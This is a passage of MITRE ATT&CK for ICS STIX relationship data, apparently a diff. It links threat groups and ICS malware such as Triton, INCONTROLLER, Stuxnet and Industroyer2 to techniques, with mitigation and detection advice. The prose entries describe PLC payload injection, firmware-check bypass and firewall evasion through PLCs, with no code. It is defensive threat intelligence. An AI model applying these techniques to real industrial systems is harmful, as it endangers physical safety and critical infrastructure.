"object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--c5dd0d66-99f1-4efd-b0f9-bf9f9118ff16", + "type": "relationship", + "created": "2020-06-10T18:36:54.638Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "NCSC Sandworm Feb 2020", + "url": "https://www.ncsc.gov.uk/news/ncsc-supports-sandworm-advisory", + "description": "NCSC. (2020, February 20). NCSC supports US advisory regarding GRU intrusion set Sandworm. Retrieved June 10, 2020." + }, + { + "source_name": "US District Court Indictment GRU Unit 74455 October 2020", + "url": "https://www.justice.gov/opa/press-release/file/1328521/download", + "description": "Scott W. Brady. (2020, October 15). United States vs. Yuriy Sergeyevich Andrienko et al.. Retrieved November 25, 2020." + }, + { + "source_name": "UK NCSC Olympic Attacks October 2020", + "url": "https://www.gov.uk/government/news/uk-exposes-series-of-russian-cyber-attacks-against-olympic-and-paralympic-games", + "description": "UK NCSC. (2020, October 19). UK exposes series of Russian cyber attacks against Olympic and Paralympic Games . Retrieved November 30, 2020." + }, + { + "source_name": "Secureworks IRON VIKING ", + "url": "https://www.secureworks.com/research/threat-profiles/iron-viking", + "description": "Secureworks. (2020, May 1). IRON VIKING Threat Profile. Retrieved June 10, 2020." + }, + { + "source_name": "Trend Micro Cyclops Blink March 2022", + "url": "https://www.trendmicro.com/en_us/research/22/c/cyclops-blink-sets-sights-on-asus-routers--.html", + "description": "Haquebord, F. et al. (2022, March 17). Cyclops Blink Sets Sights on Asus Routers. Retrieved March 17, 2022." + } + ], + "modified": "2022-03-17T15:07:01.055Z", + "description": "(Citation: NCSC Sandworm Feb 2020)(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020)(Citation: Secureworks IRON VIKING )(Citation: Trend Micro Cyclops Blink March 2022)", + "relationship_type": "uses", + "source_ref": "intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192", + "target_ref": "malware--5719af9d-6b16-46f9-9b28-fb019541ddbb", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--2867f491-919b-463f-b689-bb3ceb7ae99f", + "created": "2022-09-28T20:31:07.486Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Dragos-Pipedream", + "description": "DRAGOS. (2022, April 13). Pipedream: Chernovite’s Emerging Malware Targeting Industrial Control Systems. Retrieved September 28, 2022.", + "url": "https://hub.dragos.com/hubfs/116-Whitepapers/Dragos_ChernoviteWP_v2b.pdf?hsLang=en" + }, + { + "source_name": "Wylie-22", + "description": "Jimmy Wylie. (2022, August). Analyzing PIPEDREAM: Challenges in Testing an ICS Attack Toolkit. Defcon 30.", + "url": "https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Jimmy%20Wylie%20-%20Analyzing%20PIPEDREAM%20Challenges%20in%20testing%20an%20ICS%20attack%20toolkit.pdf" + }, + { + "source_name": "Brubaker-Incontroller", + "description": "Nathan Brubaker, Keith Lunden, Ken Proska, Muhammad Umair, Daniel Kapellmann Zafra, Corey Hildebrandt, Rob Caldwell. (2022, April 13). INCONTROLLER: New State-Sponsored Cyber Attack Tools Target Multiple Industrial Control Systems. Retrieved September 28, 2022.", + "url": "https://www.mandiant.com/resources/incontroller-state-sponsored-ics-tool" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-13T16:53:47.434Z", + "description": "[INCONTROLLER](https://attack.mitre.org/software/S1045) can use the CODESYS protocol to remotely connect to Schneider PLCs and perform maintenance functions on the device.(Citation: Wylie-22)\n\n[INCONTROLLER](https://attack.mitre.org/software/S1045) can use Telnet to upload payloads and execute commands on Omron PLCs.\t(Citation: Brubaker-Incontroller)(Citation: Dragos-Pipedream) The malware can also use HTTP-based CGI scripts (e.g., cpu.fcgi, ecat.fcgi) to gain administrative access to the device.(Citation: Wylie-22) ", + "relationship_type": "uses", + "source_ref": "malware--d3aa1058-b1b3-4c29-a3ba-9a9b90ccd93b", + "target_ref": "attack-pattern--e1f9cdd2-9511-4fca-90d7-f3e92cfdd0bf", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--2fffbea8-c031-4de8-a451-447bbbe3e224", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.201Z", + "relationship_type": "mitigates", + "description": "Consider the use of application isolation and sandboxing to restrict specific operating system interactions such as access through user accounts, services, system calls, registry, and network access. This may be even more useful in cases where the source of the executed script is unknown.\n", + "source_ref": "course-of-action--059ba11e-e3dc-49aa-84ca-88197f40d4ea", + "target_ref": "attack-pattern--2dc2b567-8821-49f9-9045-8740f3d0b958", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--7c893581-c847-495a-aa93-9d98c516e1ae", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Nicolas Falliere, Liam O Murchu, Eric Chien February 2011", + "description": "Nicolas Falliere, Liam O Murchu, Eric Chien 2011, February W32.Stuxnet Dossier (Version 1.4) Retrieved. 2017/09/22 ", + "url": "https://www.wired.com/images_blogs/threatlevel/2011/02/Symantec-Stuxnet-Update-Feb-2011.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-20T21:13:43.688Z", + "description": "[Stuxnet](https://attack.mitre.org/software/S0603)'s infection sequence consists of code blocks and data blocks that will be downloaded to the PLC to alter its behavior. (Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)", + "relationship_type": "uses", + "source_ref": "malware--088f1d6e-0783-47c6-9923-9c79b2af43d4", + "target_ref": "attack-pattern--be69c571-d746-4b1f-bdd0-c0c9817e9068", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--40479f3e-d4d2-45f8-893f-f8a4fcf1613c", + "created": "2022-09-28T21:16:28.195Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Wylie-22", + "description": "Jimmy Wylie. (2022, August). Analyzing PIPEDREAM: Challenges in Testing an ICS Attack Toolkit. Defcon 30.", + "url": "https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Jimmy%20Wylie%20-%20Analyzing%20PIPEDREAM%20Challenges%20in%20testing%20an%20ICS%20attack%20toolkit.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-13T16:53:47.435Z", + "description": "The [INCONTROLLER](https://attack.mitre.org/software/S1045) PLCProxy module can add an IP route to the CODESYS gateway running on Schneider PLCs to allow it to route messages through the PLC to other devices on that network. This allows the malware to bypass firewall rules that prevent it from directly communicating with devices on the same network as the PLC.(Citation: Wylie-22)", + "relationship_type": "uses", + "source_ref": "malware--d3aa1058-b1b3-4c29-a3ba-9a9b90ccd93b", + "target_ref": "attack-pattern--d67adac8-e3b9-44f9-9e6d-6c2a7d69dbe4", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--2087b2b9-3b30-45be-abcd-4320bf0fa66b", + "created": "2023-03-30T19:26:19.782Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Industroyer2 Mandiant April 2022", + "description": "Daniel Kapellmann Zafra, Raymond Leong, Chris Sistrunk, Ken Proska, Corey Hildebrandt, Keith Lunden, Nathan Brubaker. (2022, April 25). INDUSTROYER.V2: Old Malware Learns New Tricks. Retrieved March 30, 2023.", + "url": "https://www.mandiant.com/resources/blog/industroyer-v2-old-malware-new-tricks" + }, + { + "source_name": "Industroyer2 Forescout July 2022", + "description": "Forescout. (2022, July 14). Industroyer2 and INCONTROLLER In-depth Technical Analysis of the Most Recent ICS-specific Malware. Retrieved March 30, 2023.", + "url": "https://www.forescout.com/resources/industroyer2-and-incontroller-report/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-06T22:09:28.674Z", + "description": "[Industroyer2](https://attack.mitre.org/software/S1072) can iterate across a device’s IOAs to modify the ON/OFF value of a given IO state.(Citation: Industroyer2 Mandiant April 2022)(Citation: Industroyer2 Forescout July 2022)", + "relationship_type": "uses", + "source_ref": "malware--6a0d0ea9-b2c4-43fe-a552-ac41a3009dc5", + "target_ref": "attack-pattern--8e7089d3-fba2-44f8-94a8-9a79c53920c4", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--b8d6e550-18fe-49ad-9964-7802bbe0cb58", + "created": "2020-09-21T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Department of Homeland Security October 2009", + "description": "Department of Homeland Security 2009, October Developing an Industrial Control Systems Cybersecurity Incident Response Capability Retrieved. 2020/09/17 ", + "url": "https://us-cert.cisa.gov/sites/default/files/recommended_practices/final-RP_ics_cybersecurity_incident_response_100609.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-19T21:23:11.538Z", + "description": "Take and store data backups from end user systems and critical servers. Ensure backup and storage systems are hardened and kept separate from the corporate network to prevent compromise. Maintain and exercise incident response plans (Citation: Department of Homeland Security October 2009), including the management of gold-copy back-up images and configurations for key systems to enable quick recovery and response from adversarial activities that impact control, view, or availability.\n", + "relationship_type": "mitigates", + "source_ref": "course-of-action--ad12819e-3211-4291-b360-069f280cff0a", + "target_ref": "attack-pattern--b5b9bacb-97f2-4249-b804-47fd44de1f95", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--a7fbe555-a61b-4b93-bfb2-8e0dd0d6323e", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.126Z", + "relationship_type": "mitigates", + "description": "Consider utilizing jump boxes for external remote access. Additionally, dynamic account management may be used to easily remove accounts when not in use.\n", + "source_ref": "course-of-action--e57ebc6d-785f-40c8-adb1-b5b5e09b3b48", + "target_ref": "attack-pattern--8d2f3bab-507c-4424-b58b-edc977bd215c", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--cca191a1-3c50-4d4f-8f79-4247e58af610", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.146Z", + "relationship_type": "mitigates", + "description": "Use tools that restrict program execution via application control by attributes other than file name for common system and application utilities.\n", + "source_ref": "course-of-action--4fa717d9-cabe-47c8-8cdd-86e9e2e37f30", + "target_ref": "attack-pattern--ba203963-3182-41ac-af14-7e7ebc83cd61", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--9d9cd365-8cfe-403f-8ecb-3c23650c13c3", + "created": "2022-09-26T14:44:05.557Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:49:44.728Z", + "description": "Monitor for files (such as /etc/hosts) being accessed that may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--235b7491-2d2b-4617-9a52-3c0783680f71", + "target_ref": "attack-pattern--2fedbe69-581f-447d-8a78-32ee7db939a9", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--7c2edd6c-5189-4ba9-af3d-bdaff4a699ca", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.080Z", + "relationship_type": "mitigates", + "description": "Consider removing or restricting features that are unnecessary to an asset's intended function within the control environment.\n", + "source_ref": "course-of-action--d0909119-2f71-4923-87db-b649881672d7", + "target_ref": "attack-pattern--24a9253e-8948-4c98-b751-8e2aee53127c", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--81ca994a-b350-424d-8f39-a0b64aa76260", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.204Z", + "relationship_type": "mitigates", + "description": "Users can be trained to identify social engineering techniques and spearphishing emails.\n", + "source_ref": "course-of-action--dc61c280-c29d-44e5-a960-c0dd1623d2ba", + "target_ref": "attack-pattern--648f995e-9c3a-41e4-aeee-98bb41037426", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--ea50253a-3220-458b-b810-ad032f2b182f", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "DHS CISA February 2019", + "description": "DHS CISA 2019, February 27 MAR-17-352-01 HatManSafety System Targeted Malware (Update B) Retrieved. 2019/03/08 ", + "url": "https://ics-cert.us-cert.gov/sites/default/files/documents/MAR-17-352-01%20HatMan%20-%20Safety%20System%20Targeted%20Malware%20%28Update%20B%29.pdf" + }, + { + "source_name": "ICS-CERT December 2018", + "description": "ICS-CERT 2018, December 18 Advisory (ICSA-18-107-02) - Schneider Electric Triconex Tricon (Update B) Retrieved. 2019/03/08 ", + "url": "https://ics-cert.us-cert.gov/advisories/ICSA-18-107-02" + }, + { + "source_name": "Schneider Electric January 2018", + "description": "Schneider Electric 2018, January 23 TRITON - Schneider Electric Analysis and Disclosure Retrieved. 2019/03/14 ", + "url": "https://www.youtube.com/watch?v=f09E75bWvkk&index=3&list=PL8OWO1qWXF4qYG19p7An4Vw3N2YZ86aRS&t=0s" + }, + { + "source_name": "The Office of Nuclear Reactor Regulation", + "description": "The Office of Nuclear Reactor Regulation Schneider Electric 2018, January 23 TRITON - Schneider Electric Analysis and Disclosure Retrieved. 2019/03/14 Triconex Topical Report 7286-545-1 Retrieved. 2018/05/30 ", + "url": "https://www.nrc.gov/docs/ML1209/ML120900890.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T18:28:54.342Z", + "description": "[Triton](https://attack.mitre.org/software/S1009) disables a firmware RAM/ROM consistency check after injects a payload (imain.bin) into the firmware memory region. (Citation: DHS CISA February 2019) (Citation: ICS-CERT December 2018) (Citation: Schneider Electric January 2018) Triconex systems include continuous means of detection including checksums for firmware and program integrity, memory and memory reference integrity, and configuration. (Citation: The Office of Nuclear Reactor Regulation)", + "relationship_type": "uses", + "source_ref": "malware--80099a91-4c86-4bea-9ccb-dac55d61960e", + "target_ref": "attack-pattern--9f947a1c-3860-48a8-8af0-a2dfa3efde03", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--1f87378c-49fb-4da5-8ed3-3672633d3713", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.123Z", + "relationship_type": "mitigates", + "description": "Regularly scan the internal network for available services to identify new and potentially vulnerable services.\n", + "source_ref": "course-of-action--de0bc375-50e1-4e26-a342-a8ff8c9d3037", + "target_ref": "attack-pattern--85a45294-08f1-4539-bf00-7da08aa7b0ee", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--808174b7-3ab0-45b5-963e-5c10dd749e3c", + "created": "2020-09-21T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-21T16:43:45.457Z", + "description": "Statically defined ARP entries can prevent manipulation and sniffing of switched network traffic, as some AiTM techniques depend on sending spoofed ARP messages to manipulate network host's dynamic ARP tables.\n", + "relationship_type": "mitigates", + "source_ref": "course-of-action--52c7a1a9-3a78-4528-a44f-cd7b0fa3541a", + "target_ref": "attack-pattern--9a505987-ab05-4f46-a9a6-6441442eec3b", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--baf4bd30-4213-43c3-b70c-54418e734caf", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.184Z", + "relationship_type": "mitigates", + "description": "Filter for protocols and payloads associated with program upload activity to prevent unauthorized access to device configurations.\n", + "source_ref": "course-of-action--11f242bc-3121-438c-84b2-5cbd46a4bb17", + "target_ref": "attack-pattern--3067b85e-271e-4bc5-81ad-ab1a81d411e3", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--a946c9b1-5b89-44c9-b617-3412ffda34b9", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "MDudek-ICS", + "description": "MDudek-ICS TRISIS-TRITON-HATMAN Retrieved. 2019/11/03 ", + "url": "https://github.com/MDudek-ICS/TRISIS-TRITON-HATMAN/tree/master/decompiled_code/library" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T18:27:55.358Z", + "description": "[Triton](https://attack.mitre.org/software/S1009) calls the SafeAppendProgramMod to transfer its payloads to the Tricon. Part of this call includes preforming a program upload. (Citation: MDudek-ICS)", + "relationship_type": "uses", + "source_ref": "malware--80099a91-4c86-4bea-9ccb-dac55d61960e", + "target_ref": "attack-pattern--3067b85e-271e-4bc5-81ad-ab1a81d411e3", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--34ac1b1b-1103-4fc9-a62e-f1dd1451b28b", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-04-13T11:15:26.506Z", + "modified": "2022-05-06T17:47:24.156Z", + "relationship_type": "mitigates", + "description": "Provide the ability to verify the integrity of control logic or programs loaded on a controller. While techniques like CRCs and checksums are commonly used, they are not cryptographically strong and can be vulnerable to collisions. Preferably cryptographic hash functions (e.g., SHA-2, SHA-3) should be used. (Citation: IEC February 2019)\n", + "source_ref": "course-of-action--bcf91ebc-f316-4e19-b2f6-444e9940c697", + "target_ref": "attack-pattern--fc5fda7e-6b2c-4457-b036-759896a2efa2", + "external_references": [ + { + "source_name": "IEC February 2019", + "description": "IEC 2019, February Security for industrial automation and control systems - Part 4-2: Technical security requirements for IACS components Retrieved. 2020/09/25 ", + "url": "https://webstore.iec.ch/publication/34421" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--3bff265f-7ab9-4dae-b7a3-a5d9bc586f35", + "created": "2022-05-11T16:22:58.804Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:57:59.240Z", + "description": "Monitor for known proxy protocols (e.g., SOCKS, Tor, peer-to-peer protocols) and tool usage (e.g., Squid, peer-to-peer software) on the network that are not part of normal operations. Also monitor network data for uncommon data flows. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--a7f22107-02e5-4982-9067-6625d4a1765a", + "target_ref": "attack-pattern--d67adac8-e3b9-44f9-9e6d-6c2a7d69dbe4", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--ff3f0668-98df-44c1-88c2-711f05720eb8", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.060Z", + "relationship_type": "mitigates", + "description": "Restrict configurations changes and firmware updating abilities to only authorized individuals.\n", + "source_ref": "course-of-action--e0d38502-decb-481d-ad8b-b8f0a0c330bd", + "target_ref": "attack-pattern--19a71d1e-6334-4233-8260-b749cae37953", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--86c94552-de59-453d-ac06-28a6a64db930", + "created": "2022-05-11T16:22:58.804Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T16:47:46.836Z", + "description": "Monitor device application logs which may contain information related to operating mode changes, although not all devices produce such logs.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa", + "target_ref": "attack-pattern--2883c520-7957-46ca-89bd-dab1ad53b601", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--e5b62475-bd08-4ac6-a6f7-78f1843bf506", + "created": "2022-05-11T16:22:58.806Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T19:52:04.484Z", + "description": "Monitor executed commands and arguments for actions that aid in sniffing network traffic to capture information about an environment.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--685f917a-e95e-4ba0-ade1-c7d354dae6e0", + "target_ref": "attack-pattern--38213338-1aab-479d-949b-c81b66ccca5c", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--17fdec71-98e8-4314-a1be-037edede58bd", + "created": "2020-09-21T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-08T22:26:48.171Z", + "description": "Devices that allow remote management of firmware should require authentication before allowing any changes. The authentication mechanisms should also support [Account Use Policies](https://attack.mitre.org/mitigations/M0936), [Password Policies](https://attack.mitre.org/mitigations/M0927), and [User Account Management](https://attack.mitre.org/mitigations/M0918).", + "relationship_type": "mitigates", + "source_ref": "course-of-action--66cfe23e-34b6-4583-b178-ed6a412db2b0", + "target_ref": "attack-pattern--b9160e77-ea9e-4ba9-b1c8-53a3c466b13d", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--f9c29dd4-1c5e-4f7e-b60a-862319a6d0a0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.184Z", + "relationship_type": "mitigates", + "description": "Allow for code signing of any project files stored at rest to prevent unauthorized tampering. Ensure the signing keys are not easily accessible on the same system.\n", + "source_ref": "course-of-action--71eb7dad-07eb-4bbc-9df0-ac57bf2fba4a", + "target_ref": "attack-pattern--e72425f8-9ae6-41d3-bfdb-e1b865e60722", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--31203165-79d0-42e5-81f1-62150dea2c43", + "created": "2022-05-11T16:22:58.806Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:16:37.643Z", + "description": "Monitor network data for uncommon data flows (e.g., time of day, unusual source/destination address) that may be related to abuse of [Valid Accounts](https://attack.mitre.org/techniques/T0859) to log into a service specifically designed to accept remote connections, such as RDP, Telnet, SSH, and VNC.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--a7f22107-02e5-4982-9067-6625d4a1765a", + "target_ref": "attack-pattern--e1f9cdd2-9511-4fca-90d7-f3e92cfdd0bf", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--d9165ecb-bc10-4189-a7e4-057bdf05bf3f", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Booz Allen Hamilton", + 